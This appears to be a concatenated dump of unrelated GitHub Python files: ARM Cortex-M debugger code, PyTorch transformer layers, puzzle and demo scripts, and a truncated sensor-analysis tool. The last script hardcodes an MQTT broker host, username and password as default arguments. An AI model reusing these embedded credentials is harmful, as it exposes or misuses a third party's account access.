(Target.SecurityState.NONSECURE, Target.SecurityState.SECURE)\n else:\n return (Target.SecurityState.NONSECURE,)\n\n def _read_core_type(self):\n \"\"\"@brief Read the CPUID register and determine core type and architecture.\"\"\"\n # Schedule deferred reads.\n cpuid_cb = self.read32(self.CPUID, now=False)\n pfr0_cb = self.read32(self.PFR0, now=False)\n pfr1_cb = self.read32(self.PFR1, now=False)\n dfr0_cb = self.read32(self.DFR0, now=False)\n isar0_cb = self.read32(self.ISAR0, now=False)\n isar3_cb = self.read32(self.ISAR3, now=False)\n isar5_cb = self.read32(self.ISAR5, now=False)\n pmu_type_cb = self.read32(self.PMU_TYPE, now=False)\n mpu_type_cb = self.read32(self.MPU_TYPE, now=False)\n\n # Read CPUID register\n cpuid = cpuid_cb()\n implementer = (cpuid & CortexM.CPUID_IMPLEMENTER_MASK) >> CortexM.CPUID_IMPLEMENTER_POS\n arch = (cpuid & CortexM.CPUID_ARCHITECTURE_MASK) >> CortexM.CPUID_ARCHITECTURE_POS\n self.core_type = (cpuid & CortexM.CPUID_PARTNO_MASK) >> CortexM.CPUID_PARTNO_POS\n self.cpu_revision = (cpuid & CortexM.CPUID_VARIANT_MASK) >> CortexM.CPUID_VARIANT_POS\n self.cpu_patch = (cpuid & CortexM.CPUID_REVISION_MASK) >> CortexM.CPUID_REVISION_POS\n\n # Check for DSP extension\n isar3 = isar3_cb()\n isar3_simd = (isar3 & self.ISAR3_SIMD_MASK) >> self.ISAR3_SIMD_SHIFT\n if isar3_simd == self.ISAR3_SIMD__DSP:\n self._extensions.append(CortexMExtension.DSP)\n\n # Check for RAS extension.\n pfr0 = pfr0_cb()\n pfr0_ras = (pfr0 & self.PFR0_RAS_MASK) >> self.PFR0_RAS_SHIFT\n if pfr0_ras == self.PFR0_RAS_VERSION_1:\n self._extensions.append(CortexMExtension.RAS)\n\n # Check for the security extension.\n pfr1 = pfr1_cb()\n pfr1_sec = (pfr1 & self.PFR1_SECURITY_MASK) >> self.PFR1_SECURITY_SHIFT\n self.has_security_extension = pfr1_sec in (self.PFR1_SECURITY_EXT_V8_0, self.PFR1_SECURITY_EXT_V8_1)\n if self.has_security_extension:\n self._extensions.append(CortexMExtension.SEC)\n if pfr1_sec == self.PFR1_SECURITY_EXT_V8_1:\n self._extensions.append(CortexMExtension.SEC_V81)\n\n # Check for UDE extension.\n dfr0 = dfr0_cb()\n dfr0_ude = (dfr0 & self.DFR0_UDE_MASK) >> self.DFR0_UDE_SHIFT\n if dfr0_ude == self.DFR0_UDE_SUPPORTED:\n self._extensions.append(CortexMExtension.UDE)\n\n # Check for PACBTI extension.\n isar5 = isar5_cb()\n isar5_pacbti = (isar5 & self.ISAR5_PACBTI_MASK) >> self.ISAR5_PACBTI_SHIFT\n if isar5_pacbti != self.ISAR5_PACBTI__NONE:\n self._extensions.append(CortexMExtension.PACBTI)\n\n # Check for PMU extension.\n pmu_type = pmu_type_cb()\n pmu_type_n = pmu_type & self.PMU_TYPE_N_MASK\n if pmu_type_n > 0:\n self._extensions.append(CortexMExtension.PMU)\n\n # Check for MPU extension\n mpu_type = mpu_type_cb()\n mpu_type_dregions = (mpu_type & self.MPU_TYPE_DREGIONS_MASK) >> self.MPU_TYPE_DREGIONS_SHIFT\n if mpu_type_dregions > 0:\n self._extensions.append(CortexMExtension.MPU)\n\n # Determine the base/main variant.\n if arch == self.ARMv8M_BASE:\n self._architecture = CoreArchitecture.ARMv8M_BASE\n else:\n self._architecture = CoreArchitecture.ARMv8M_MAIN\n\n # Determine the architecture major/minor version.\n # The presence of low-overhead loop and branch instructions is used to distinguish v8.1-M from v8.0-M.\n isar0 = isar0_cb()\n isar0_cmpbranch = (isar0 & self.ISAR0_CMPBRANCH_MASK) >> self.ISAR0_CMPBRANCH_SHIFT\n if isar0_cmpbranch == self.ISAR0_CMPBRANCH__LOB:\n self._arch_version = (8, 1)\n else:\n self._arch_version = (8, 0)\n\n self._core_name = CORE_TYPE_NAME.get((implementer, self.core_type), f\"Unknown (CPUID={cpuid:#010x})\")\n\n def _check_for_fpu(self):\n \"\"\"@brief Determine if a core has an FPU.\n\n In addition to the tests performed by CortexM, this method tests for the MVE extension.\n \"\"\"\n # Schedule this deferred read before calling the super implementation.\n mvfr1_cb = self.read32(self.MVFR1, now=False)\n\n super()._check_for_fpu()\n\n # Check for MVE.\n mvfr1 = mvfr1_cb()\n mve = (mvfr1 & self.MVFR1_MVE_MASK) >> self.MVFR1_MVE_SHIFT\n if mve == self.MVFR1_MVE__INTEGER:\n self._extensions.append(CortexMExtension.MVE)\n elif mve == self.MVFR1_MVE__FLOAT:\n self._extensions += [CortexMExtension.MVE, CortexMExtension.MVE_FP]\n\n # Check for half-precision FP.\n fp16 = (mvfr1 & self.MVFR1_FP16_MASK) >> self.MVFR1_FP16_SHIFT\n if fp16 == self.MVFR1_FP16__SUPPORTED:\n self._extensions.append(CortexMExtension.FPU_HP)\n\n def _build_registers(self):\n super()._build_registers()\n\n # Registers available with Security extension, either Baseline or Mainline.\n if self.has_security_extension:\n self._core_registers.add_group(CoreRegisterGroups.V8M_SEC_ONLY)\n\n # Mainline-only registers.\n if self.architecture == CoreArchitecture.ARMv8M_MAIN:\n self._core_registers.add_group(CoreRegisterGroups.V7M_v8M_ML_ONLY)\n\n # Registers available when both Mainline and Security extensions are implemented.\n if self.has_security_extension:\n self._core_registers.add_group(CoreRegisterGroups.V8M_ML_SEC_ONLY)\n\n # MVE registers.\n if CortexMExtension.MVE in self.extensions:\n self._core_registers.add_group(CoreRegisterGroups.V81M_MVE_ONLY)\n\n def get_security_state(self):\n \"\"\"@brief Returns the current security state of the processor.\n\n @return @ref pyocd.core.target.Target.SecurityState \"Target.SecurityState\" enumerator.\n \"\"\"\n dscsr = self.read32(self.DSCSR)\n if (dscsr & self.DSCSR_CDS) != 0:\n return Target.SecurityState.SECURE\n else:\n return Target.SecurityState.NONSECURE\n\n def clear_debug_cause_bits(self):\n self.write32(CortexM.DFSR,\n self.DFSR_PMU\n | CortexM.DFSR_EXTERNAL\n | CortexM.DFSR_VCATCH\n | CortexM.DFSR_DWTTRAP\n | CortexM.DFSR_BKPT\n | CortexM.DFSR_HALTED)\n\n def get_halt_reason(self):\n \"\"\"@brief Returns the reason the core has halted.\n\n This overridden version of this method adds support for v8.x-M halt reasons.\n\n @return @ref pyocd.core.target.Target.HaltReason \"Target.HaltReason\" enumerator or None.\n \"\"\"\n dfsr = self.read32(self.DFSR)\n if dfsr & self.DFSR_HALTED:\n reason = Target.HaltReason.DEBUG\n elif dfsr & self.DFSR_BKPT:\n reason = Target.HaltReason.BREAKPOINT\n elif dfsr & self.DFSR_DWTTRAP:\n reason = Target.HaltReason.WATCHPOINT\n elif dfsr & self.DFSR_VCATCH:\n reason = Target.HaltReason.VECTOR_CATCH\n elif dfsr & self.DFSR_EXTERNAL:\n reason = Target.HaltReason.EXTERNAL\n elif dfsr & self.DFSR_PMU:\n reason = Target.HaltReason.PMU\n else:\n reason = None\n return reason\n\n","repo_name":"pyocd/pyOCD","sub_path":"pyocd/coresight/cortex_m_v8m.py","file_name":"cortex_m_v8m.py","file_ext":"py","file_size_in_byte":9776,"program_lang":"python","lang":"en","doc_type":"code","stars":986,"dataset":"github-code","pt":"19"} +{"seq_id":"8162011902","text":"from typing import Optional\nfrom torch import Tensor\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\nimport math\nimport copy\n\nclass ResBlock(nn.Module):\n def __init__(self, n_dim):\n super(ResBlock, self).__init__()\n\n self.n_dim = n_dim\n\n self.fc1 = nn.Linear(n_dim, n_dim)\n self.fc2 = nn.Linear(n_dim, n_dim)\n self.acfun = nn.LeakyReLU()\n\n def forward(self, x0):\n\n x = self.acfun(self.fc1(x0))\n x = self.acfun(self.fc2(x))\n x = x+x0\n return x\n\nclass TransformerEncoderLayer(nn.Module):\n r\"\"\"TransformerEncoderLayer is made up of self-attn and feedforward network.\n This standard encoder layer is based on the paper \"Attention Is All You Need\".\n Ashish Vaswani, Noam Shazeer, Niki Parmar, Jakob Uszkoreit, Llion Jones, Aidan N Gomez,\n Lukasz Kaiser, and Illia Polosukhin. 2017. Attention is all you need. In Advances in\n Neural Information Processing Systems, pages 6000-6010. Users may modify or implement\n in a different way during application.\n\n Args:\n d_model: the number of expected features in the input (required).\n nhead: the number of heads in the multiheadattention models (required).\n dim_feedforward: the dimension of the feedforward network model (default=2048).\n dropout: the dropout value (default=0.1).\n activation: the activation function of the intermediate layer, can be a string\n (\"relu\" or \"gelu\") or a unary callable. Default: relu\n layer_norm_eps: the eps value in layer normalization components (default=1e-5).\n batch_first: If ``True``, then the input and output tensors are provided\n as (batch, seq, feature). Default: ``False``.\n\n Examples::\n >>> encoder_layer = nn.TransformerEncoderLayer(d_model=512, nhead=8)\n >>> src = torch.rand(10, 32, 512)\n >>> out = encoder_layer(src)\n\n Alternatively, when ``batch_first`` is ``True``:\n >>> encoder_layer = nn.TransformerEncoderLayer(d_model=512, nhead=8, batch_first=True)\n >>> src = torch.rand(32, 10, 512)\n >>> out = encoder_layer(src)\n \"\"\"\n __constants__ = ['batch_first', 'norm_first']\n\n def __init__(self, d_model, nhead, dim_feedforward=2048, dropout=0.1, activation=F.relu,\n layer_norm_eps=1e-5, batch_first=False,\n device=None, dtype=None) -> None:\n factory_kwargs = {'device': device, 'dtype': dtype}\n super(TransformerEncoderLayer, self).__init__()\n self.self_attn = nn.MultiheadAttention(d_model, nhead, dropout=dropout, batch_first=batch_first, \n **factory_kwargs)\n # Implementation of Feedforward model\n self.linear1 = nn.Linear(d_model, dim_feedforward, **factory_kwargs)\n self.dropout = nn.Dropout(dropout)\n self.linear2 = nn.Linear(dim_feedforward, d_model, **factory_kwargs)\n\n self.norm_first = False\n self.norm1 = nn.LayerNorm(d_model, eps=layer_norm_eps, **factory_kwargs)\n self.norm2 = nn.LayerNorm(d_model, eps=layer_norm_eps, **factory_kwargs)\n self.dropout1 = nn.Dropout(dropout)\n self.dropout2 = nn.Dropout(dropout)\n\n # Legacy string support for activation function.\n if isinstance(activation, str):\n self.activation = _get_activation_fn(activation)\n else:\n self.activation = activation\n\n def __setstate__(self, state):\n if 'activation' not in state:\n state['activation'] = F.relu\n super(TransformerEncoderLayer, self).__setstate__(state)\n\n def forward(self, src: Tensor, src_mask: Optional[Tensor] = None, src_key_padding_mask: Optional[Tensor] = None) -> Tensor:\n r\"\"\"Pass the input through the encoder layer.\n\n Args:\n src: the sequence to the encoder layer (required).\n src_mask: the mask for the src sequence (optional).\n src_key_padding_mask: the mask for the src keys per batch (optional).\n\n Shape:\n see the docs in Transformer class.\n \"\"\"\n\n # see Fig. 1 of https://arxiv.org/pdf/2002.04745v1.pdf\n\n x = src\n if self.norm_first:\n x = x + self._sa_block(self.norm1(x), src_mask, src_key_padding_mask)\n x = x + self._ff_block(self.norm2(x))\n else:\n atten_output, atten_score = self._sa_block(x, src_mask, src_key_padding_mask)\n x = self.norm1(x + atten_output)\n x = self.norm2(x + self._ff_block(x))\n\n return x, atten_score\n\n # self-attention block\n def _sa_block(self, x: Tensor,\n attn_mask: Optional[Tensor], key_padding_mask: Optional[Tensor]) -> Tensor:\n # x = self.self_attn(x, x, x,\n # attn_mask=attn_mask,\n # key_padding_mask=key_padding_mask,\n # need_weights=False)[0]\n x = self.self_attn(x, x, x,\n attn_mask=attn_mask,\n key_padding_mask=key_padding_mask,\n need_weights=True)\n # return self.dropout1(x)\n return self.dropout1(x[0]), x[1]\n\n # feed forward block\n def _ff_block(self, x: Tensor) -> Tensor:\n x = self.linear2(self.dropout(self.activation(self.linear1(x))))\n return self.dropout2(x)\n\ndef _get_activation_fn(activation):\n if activation == \"relu\":\n return F.relu\n elif activation == \"gelu\":\n return F.gelu\n\n raise RuntimeError(\"activation should be relu/gelu, not {}\".format(activation))\n\nclass PositionalEncoding(nn.Module):\n def __init__(self, d_model, dropout=0.1, max_len=5000):\n super(PositionalEncoding, self).__init__()\n self.dropout = nn.Dropout(p=dropout)\n\n pe = torch.zeros(max_len, d_model)\n position = torch.arange(0, max_len, dtype=torch.float).unsqueeze(1)\n div_term = torch.exp(torch.arange(0, d_model, 2).float() * (-np.log(10000.0) / d_model))\n pe[:, 0::2] = torch.sin(position * div_term)\n pe[:, 1::2] = torch.cos(position * div_term)\n pe = pe.unsqueeze(0).transpose(0, 1)\n \n self.register_buffer('pe', pe)\n\n def forward(self, x):\n # not used in the final model\n x = x + self.pe[:x.shape[0], :]\n return self.dropout(x)\n","repo_name":"Silverster98/HUMANISE","sub_path":"model/blocks.py","file_name":"blocks.py","file_ext":"py","file_size_in_byte":6348,"program_lang":"python","lang":"en","doc_type":"code","stars":88,"dataset":"github-code","pt":"19"} +{"seq_id":"71084337323","text":"import math\n\n\ndef calculateRows(position, rowAmmount):\n min = 0\n max = rowAmmount\n for letter in position:\n if letter in 'FL':\n max = min + math.floor((max - min) / 2)\n elif letter in 'BR':\n min = min + math.ceil((max - min) / 2)\n return min\n\n\ndef calculatePosition(sit: str):\n row = calculateRows(sit[:7], 127)\n col = calculateRows(sit[7:], 7)\n return row * 8 + col\n\n\nsits = [line.rstrip('\\n') for line in open('data/data.txt')]\n\npositions = []\nfor sit in sits:\n positions.append(calculatePosition(sit))\n\nmin = min(positions)\nmax = max(positions)\n\nfor i in range(min + 1, max - 1):\n if (i not in positions and (i+1) in positions and (i-1) in positions):\n print(i)","repo_name":"Keeeweee/adventOfCode-2020","sub_path":"day-05/second.py","file_name":"second.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"22920939000","text":"# -*- coding: utf-8 -*-\n\nimport torch\nfrom torch.autograd import Variable as V\nimport torchvision.models as models\nfrom torchvision import transforms as trn\nfrom torch.nn import functional as F\nimport os\nfrom PIL import Image\nimport cv2\nimport numpy as np\nimport time\n\n\n# th architecture to use\narch = 'resnet50'\n# load the pre-trained weights\nmodel_file = './models/%s_places365.pth.tar' % arch\nmodel = models.__dict__[arch](num_classes=365)\ncheckpoint = torch.load(model_file, map_location=lambda storage, loc: storage)\nstate_dict = {str.replace(k,'module.',''): v for k,v in checkpoint['state_dict'].items()}\nmodel.load_state_dict(state_dict)\nmodel.eval()\n\n# load the class label\nfile_name = './categories/categories_places365.txt'\nclasses = list()\nwith open(file_name) as class_file:\n for line in class_file:\n classes.append(line.strip().split(' ')[0][3:])\nclasses = tuple(classes)\n\n\n# load the image transformer\ncentre_crop = trn.Compose([\n trn.Resize((256,256)),\n trn.CenterCrop(224),\n trn.ToTensor(),\n trn.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n])\n\n\n# cap = cv2.VideoCapture('.\\\\imgs\\\\sample.mp4') \ncap = cv2.VideoCapture(0, cv2.CAP_DSHOW)\nframes = 0\nlblDic = {}\nstart = time.time() \nwhile(True):\n # Capture frame-by-frame\n ret, frame = cap.read()\n frame = cv2.resize(frame,None,fx=0.5, fy=0.5, interpolation = cv2.INTER_CUBIC)\n cv2_im = cv2.cvtColor(frame,cv2.COLOR_BGR2RGB)\n img = Image.fromarray(cv2_im)\n \n input_img = V(centre_crop(img).unsqueeze(0))\n # forward pass\n logit = model.forward(input_img)\n h_x = F.softmax(logit, 1).data.squeeze()\n probs, idx = h_x.sort(0, True)\n preds = ''\n horPos = 10\n verPos = 50\n label = [] \n # output the prediction\n for i in range(0, 5):\n preds = \"{} = {:.3f}\".format(classes[idx[i]],probs[i])\n label.append({classes[idx[i]]:\"{:.3f}\".format(probs[i])})\n cv2.putText(frame,preds,(horPos,verPos), cv2.FONT_HERSHEY_SIMPLEX, 0.8, (0,0,255), 2, cv2.LINE_AA)\n verPos += 30\n print(label)\n lblDic[frames] = label\n frames += 1\n print (\"Frames : \"+ str(frames))\n print(\"FPS of the video is {:5.2f}\".format( frames / (time.time() - start)))\n cv2.imshow('frame',frame)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n# When everything done, release the capture\ncap.release()\ncv2.destroyAllWindows()\n\nimport json\nwith open('places.json', 'w') as outfile:\n json.dump(lblDic, outfile)\n\n\n# load the test image\n#img_name = './imgs/12.jpg'\n#img = Image.open(img_name)\n#input_img = V(centre_crop(img).unsqueeze(0))\n# forward pass\n#logit = model.forward(input_img)\n#h_x = F.softmax(logit, 1).data.squeeze()\n#probs, idx = h_x.sort(0, True)\n\n#print('{} prediction on {}'.format(arch,img_name))\n# output the prediction\n#for i in range(0, 5):\n# print('{:.3f} -> {}'.format(probs[i], classes[idx[i]]))\n","repo_name":"MorphSeur/SceneRecognition","sub_path":"archive/sceneRecognition.py","file_name":"sceneRecognition.py","file_ext":"py","file_size_in_byte":2891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"74429609324","text":"import os\nfrom ftplib import FTP\n\n\ndef main():\n if os.path.exists('patch8.gz'):\n raise IOError('refusing to overwrite your patch8.gz file')\n\n ftp = FTP('ftp.kernel.org')\n ftp.login()\n ftp.cwd('/pub/linux/kernel/v1.0')\n\n with open('patch8.gz', 'wb') as f:\n ftp.retrbinary('RETR patch8.gz', f.write)\n\n ftp.quit()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"fireinrain/python-network","sub_path":"chapter17/binarydl.py","file_name":"binarydl.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"33708296301","text":"import os\nimport numpy as np\nimport PIL.Image as Image\n\ndef post_process(pred):\n h, w, _ = pred.shape\n pred = pred.reshape((h, w))\n img = Image.fromarray(pred)\n return img\n\ndef gen_featuremap(filename, random_interval = False, temporal_rgb_frames = 5):\n New_image = Image.new('RGB', size = (480, 480))\n pred_path = '../Human_Parsing/output/' + filename + '.npy'\n if not os.path.exists(pred_path):\n return New_image\n \n data = np.load(pred_path, allow_pickle = True)\n num_frames = data.shape[0]\n\n start = 0\n sample_interval = num_frames // temporal_rgb_frames\n if random_interval: sample_interval = np.random.randint(1, num_frames // temporal_rgb_frames + 1)\n if sample_interval == 0:\n Func = lambda m, n: [i*n//m + n//(2*m) for i in range(m)]\n frame_range = Func(temporal_rgb_frames, num_frames)\n else: frame_range = range(start, num_frames, sample_interval)\n\n for idx, value in enumerate(frame_range[0:temporal_rgb_frames]):\n img = post_process(data[value]).resize((int(480/temporal_rgb_frames), 480))\n New_image.paste(img, (int(480/temporal_rgb_frames)*idx, 0))\n\n return New_image","repo_name":"liujf69/IPP-Net-Parsing","sub_path":"feeders/gen_parsing.py","file_name":"gen_parsing.py","file_ext":"py","file_size_in_byte":1167,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"19"} +{"seq_id":"23947636679","text":"def split_csv(dirName):\n\tfil = 'output/'+dirName+'/members.csv'\n\tcsvfilename = open(fil, 'r').readlines()\n\t#store header values\n\theader = csvfilename[0] \n\t#remove header from list\n\tcsvfilename.pop(0) \n\tfile = 1\n\t#Number of lines to be written in new file\n\trecord_per_file = 50\n\n\tfor j in range(len(csvfilename)):\n\t\tif j % record_per_file == 0:\n\t\t\twrite_file = csvfilename[j:j+record_per_file]\n\t #adding header at the start of the write_file\n\t\t\twrite_file.insert(0, header)\n\t \t \t#write in file\n\t\t\topen(str(fil.replace('.csv',''))+ str(file) + '.csv', 'w+').writelines(write_file)\n\t\t\tfile += 1\n","repo_name":"Dagimal/telegram-scraper-kit","sub_path":"core/CsvSplitter/split.py","file_name":"split.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"14117790087","text":"# downloading pkl model file from GCP's cloud_storage service node\n# to be able to use here in GCP's app_engine service node\nimport pickle\nfrom google.cloud import storage\nstorage_client = storage.Client()\nbucket = storage_client.get_bucket('model-bucket-iris-sk')\nblob = bucket.blob('Iris_SV_Classfier.pkl')\nblob.download_to_filename('/tmp/Iris_SV_Classfier.pkl')\nmodel = pickle.load(open('/tmp/Iris_SV_Classfier.pkl', 'rb'))\n\n\n#\nimport requests \ndef predict(request):\n if request.method == 'GET':\n return 'please send post request!'\n elif request.method == 'POST':\n input_paras = request.get_json()\n \n sepal_length = input_paras['sepal_length']\n sepal_width = input_paras['sepal_width']\n petal_length = input_paras['petal_length']\n petal_width = input_paras['petal_width']\n \n import numpy as np\n input = np.array([[sepal_length, sepal_width, petal_length, petal_width]]) \n # so basically this 2d array in input ka mutlib ye hai ki, this 1d array in [] is nothing\n # but a row, being passed for prediction to model\n \n prediction = model.predict(input)\n return str(prediction)","repo_name":"Sarvesh-Kesharwani/HouseDataPrediction_kaggle","sub_path":"Flask/deployment/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"19326692719","text":"from . import WaitSecs, GetSecs, PsychPortAudio, PsychHID, IOPort\n\n# Extract their \"main\" function, which is named just like the module,\n# and assign its function handle to a variable named just like the module.\n# This will cause the function handles to shadow the original module, so\n# now the module can be called with (almost) identical syntax as one is\n# used to from Octave or Matlab:\nWaitSecs = getattr(WaitSecs, 'WaitSecs');\nGetSecs = getattr(GetSecs, 'GetSecs');\nPsychPortAudio = getattr(PsychPortAudio, 'PsychPortAudio');\nPsychHID = getattr(PsychHID, 'PsychHID');\nIOPort = getattr(IOPort, 'IOPort');\n","repo_name":"ryankajia/Psychtoolbox-3","sub_path":"PsychPython/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"} +{"seq_id":"32264718557","text":"import os\nimport re\nimport ast\nimport sys\nimport json\nimport time\nimport pygame\nimport _thread\nimport argparse\nimport warnings\nimport pygame_gui\nimport numpy as np\nfrom scipy import signal\nfrom collections import deque\nfrom datetime import datetime\nimport paho.mqtt.client as paho\nfrom post_process import live_processing\n\n\ndef analyze(config_json_path=None, floorplan=None, address_dict=None, live=False, display='overlay', fps=10,\n aspect_ratio=(1000, 1000), grid_dimensions=None, data_path=None, det_path=None, post=True, convert='none',\n start_time=0, end_time=np.inf, show_graph=True, graph_path=\"\", replaying=False, rotation=0,\n show_raw_detections=True, mqtt_address=\"ec2-34-222-201-1.us-west-2.compute.amazonaws.com\", mqtt_usn=\"butlr\",\n mqtt_pwd=\"2019Ted/\", mqtt_in=\"butlr/idp_sante/heatic/raw_data\", mqtt_out=\"butlr/idp_sante/heatic/out\",\n mqtt_detections_in=\"butlr/idp_sante/heatic/detection\",\n mqtt_detections_out=\"butlr/idp_sante/heatic/detections_post\"):\n \"\"\"\n :param config_json_path: (string) path to spatial configuration json file\n :param floorplan: (string) path to floorplan png file over which the sensor output will be shown\n :param address_dict: (dictionary) Should be made into a json argument to be loaded. For now, a dictionary of sensor\n names and corresponding deviceNames\n :param live: (bool) Process live data\n :param display: (string) \"grid\"/\"overlay\"/\"none\" --> grid = no floorplan, overlay = floorplan, none = no viz\n :param fps: (int) frames per second for visualization\n :param aspect_ratio: (2-tuple) Aspect ratio of floorplan image in pixels, default (1000x1000)\n :param grid_dimensions: (3-tuple) (# plots in x direction, # plots in y direction, size of individual plot)\n e.g. (6, 2, 100) would be a 2x6 grid of plots each of size 100x100px\n :param data_path: (string) path to saved raw data file\n :param det_path: (string) path to saved detection data file\n :param post: (bool) perform post processing\n :param convert: (str) 'wiwide', 'seamless', 'none'. Changes the way the data are parsed\n :param start_time: (int) Epoch mSec time from which to start analysis\n :param end_time: (int) Epoch mSec time to end analysis\n :param show_graph: (bool) show graph created for post processing\n :param graph_path: (str) path to graph (need not exist yet)\n :param replaying: (bool) data coming from Arihan's replay app. Formatting is a little different in this case.\n :param rotation: (float) degrees rotation counterclockwise (IDP --> -90, grid --> 90 or 0.)\n :param show_raw_detections: (bool) show raw detections and post-processed detections simultaneously\n :param mqtt_address: (string) address of broker\n :param mqtt_in: (string) raw data topic\n :param mqtt_out: (string) output topic (currently not used)\n :param mqtt_detections_in: (string) handcraft algorithm detection topic\n :param mqtt_usn: (string) MQTT username\n :param mqtt_pwd: (string) MQTT password\n :param mqtt_detections_out: (string) topic to which post-processed detections will be written\n :return: void\n \"\"\"\n global data_queue\n global detection_queue\n global traj_queue\n global data_queue1\n global detection_queue1\n global post_queue\n global client\n\n global lo\n global hi\n\n global playback\n global text_line\n\n global show_det_local\n global use_delta\n\n lo = 100\n hi = 0\n\n os.environ['TZ'] = 'UTC'\n time.tzset()\n\n data_queue = deque([])\n detection_queue = deque([])\n traj_queue = deque([])\n\n data_queue1 = deque([])\n detection_queue1 = deque([])\n\n post_queue = deque([])\n client = paho.Client()\n\n wiwide = False\n seamless = False\n verizon = False\n if not replaying:\n if convert == 'wiwide':\n wiwide = True\n elif convert == 'seamless':\n seamless = True\n elif convert == 'verizon':\n verizon = True\n\n if config_json_path:\n addresses = {}\n centers = {}\n with open(config_json_path, \"r\") as cfg:\n full_json = json.load(cfg)\n config = full_json['sensors']\n coord_config = full_json['coordinates']\n exit_points = coord_config[0]['exits']\n try:\n rd_key = \"room_dimensions\"\n size_meters = full_json[rd_key]\n except KeyError:\n rd_key = \"room dimensions\"\n size_meters = full_json[rd_key]\n for s in config:\n addresses[s['label']] = s['deviceName']\n centers[s['label']] = s['center']\n print(addresses)\n if display == \"overlay\":\n aspect = aspect_ratio\n scaleX = aspect[0] / 1000\n scaleY = aspect[1] / 1000\n meterX = (aspect[0] / size_meters[0])\n meterY = (aspect[1] / size_meters[1])\n\n sizes, positions, rotations = _sizes_positions(full_json, meterX, meterY, aspect_ratio)\n\n if det_path and not os.path.exists(det_path) and not live:\n # data_converter(data_path, data_path[:-4] + \"_converted.txt\")\n converted = data_path\n sensitivity_params = \"-cr2 0.4 -br2 0.8 -csh -0.8 -bsh -1.2 -csc 0.6 -bsc 0.6 -dr 3,2.5 -dmh both \" \\\n \"-dmc th -thh auto -thc -999 -thstdh 3.5 -thstdc 7.5 \"\n sensitivity_params2 = \"-cr2 0.3 -br2 0.5 -csh -0.5 -bsh -0.7 -csc 0.6 -bsc 0.6 -dmh both \" \\\n \"-dmc th -thh auto -thc -999 -thstdc 7.5 -thstdh 3\"\n if config_json_path:\n config = f\"-wldcd t -scfgp {config_json_path}\"\n else:\n config = \"\"\n\n trk = \"t\" if wiwide else \"f\"\n\n for sensor in addresses.values():\n cmd = f'python3 Butlr_PoC.py -m saved_data -mqid {sensor} -dp {converted} -viz f -pub f -n t -amm t ' \\\n f'-mmdl 10 -imin 5 -imax 25 -wamm 1000 -famm 5 -abg t -rabg 5000 -fabg 10 -lt 100 -vt 10,50 ' \\\n f'-cr2 0.2 -br2 0.2 -csh -0.5 -bsh -0.6 -csc 0.6 -bsc 0.6 -dmh both -dmc th -dr 3,2.5 ' \\\n f'-thh auto -thc auto -thstdc 7.5 -thstdh 3 -ds 0.5001,0.0001 -de 0.5001,0.9999 -dprv 0 -ahr 0 ' \\\n f'-drt f -be f -tshc t -cfo t -wk t -art f -trk {trk} -dtcwf t {config} -dtcwp {det_path}'\n print(\"Running the handcraft algorithm on the provided dataset...\")\n os.system(cmd)\n\n if display != 'none':\n pygame.init()\n\n white = (255, 255, 255)\n black = (0, 0, 0)\n red = (255, 0, 0)\n font = pygame.font.Font('font/Consola.ttf', 12)\n clock = pygame.time.Clock()\n\n if live:\n data_type = \"live\"\n else:\n data_type = \"historical\"\n\n if display == 'grid':\n if grid_dimensions is None:\n grid_dimensions = [int(np.around(len(addresses) / 2)), 2, 200]\n box = grid_dimensions[2]\n width = grid_dimensions[0] * box\n height = box * grid_dimensions[1]\n aspect = (width, height)\n font_size = min(12, int(grid_dimensions[2] // 25))\n\n font = pygame.font.Font('font/Consola.ttf', font_size)\n\n disp = pygame.display.set_mode((width, height + (font_size * 3)))\n else:\n if not live:\n disp = pygame.display.set_mode((aspect_ratio[0], int(1.1 * aspect_ratio[1])))\n manager = pygame_gui.UIManager((aspect_ratio[0], int(1.1 * aspect_ratio[1])))\n playback = pygame_gui.elements.UIHorizontalSlider(relative_rect=pygame.Rect((10,\n int(aspect_ratio[1] * 1.02),\n int(aspect_ratio[0] // 2),\n int(aspect_ratio[\n 1] * 1.1 // 20))),\n start_value=0.,\n value_range=(0., 1.),\n manager=manager)\n else:\n disp = pygame.display.set_mode(aspect)\n pygame.display.set_caption(f'butlr. {data_type} data analysis')\n\n sensors = list(addresses.keys())\n lo = 12\n hi = 45\n\n zero_matrix = np.zeros((8, 8))\n zero_matrix.fill(lo)\n\n if live:\n trajectory_topic = \"\"\n if wiwide:\n trajectory_topic = mqtt_in + \"_out\"\n _thread.start_new_thread(mqtt_processes, (mqtt_address, mqtt_in, mqtt_detections_in, trajectory_topic,\n mqtt_detections_out, mqtt_usn, mqtt_pwd))\n\n else:\n det_start_idx = {}\n for sensor in sensors: det_start_idx[sensor] = 0\n if not os.path.exists(data_path[:-4] + \"_sorted.txt\"):\n print(\"Sorting data by timestamp\")\n with open(data_path, \"r\") as f:\n unsorted0 = f.readlines()\n unsorted0.sort(key=lambda x: ast.literal_eval(x)['timestamp'])\n with open(data_path[:-4] + \"_sorted.txt\", \"w+\") as f:\n f.writelines(unsorted0)\n\n with open(data_path, \"r\") as f:\n text = f.readlines()\n if det_path:\n with open(det_path, \"r\") as f:\n det_text = f.readlines()\n text_line = 0\n\n post_path_out = \"\"\n if post:\n post_path_out = det_path[:-4] + \"_POST.txt\"\n _thread.start_new_thread(live_processing, (config_json_path, 3, None, detection_queue1,\n post_path_out, False))\n\n matrices = {}\n trajectories = {}\n traj_times = {}\n trajectory_tracking = \"\"\n last_traj_sensor = \"\"\n 